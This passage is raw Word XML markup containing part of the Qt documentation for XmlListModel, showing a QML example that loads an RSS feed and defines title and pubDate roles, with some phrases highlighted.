        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/pubDate&gt;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r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/item&gt;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r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/channel&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="002736BE" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/rss&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="002736BE" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1638" w:anchor="xmllistmodel" w:history="1">
        <w:r w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>could create a model from this data, like this:</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XmlListModel</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</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736BE" w:rsidRPr="002736BE" w:rsidRDefault="00490E7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639" w:history="1">
        <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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id</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xmlModel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="000821BB" w:rsidRDefault="002736BE" w:rsidP="002736BE">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bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>source</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"http://www.mysite.com/feed.xml"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="000821BB" w:rsidRDefault="002736BE" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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query</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"/rss/channel/item"</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hyperlink r:id="rId1640" w:history="1">
        <w:r w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlRole</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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name</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w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"title"</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query</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w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"title/string()"</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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hyperlink r:id="rId1641" w:history="1">
        <w:r w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlRole</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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name</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w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"pubDate"</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query</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w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"pubDate/string()"</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="002736BE" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="002736BE" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1642" w:anchor="query-prop" w:history="1">
        <w:r w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>query</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>value of "/rss/channel/item" specifies that the</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1643" w:anchor="xmllistmodel" w:history="1">
        <w:r w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>should generate a model item for each</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;item&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in the XML document.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="002736BE" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1644" w:history="1">
        <w:r w:rsidRPr="00B75670">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlRole</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B75670">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects define the model item attributes</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Here</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, each model item will have</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
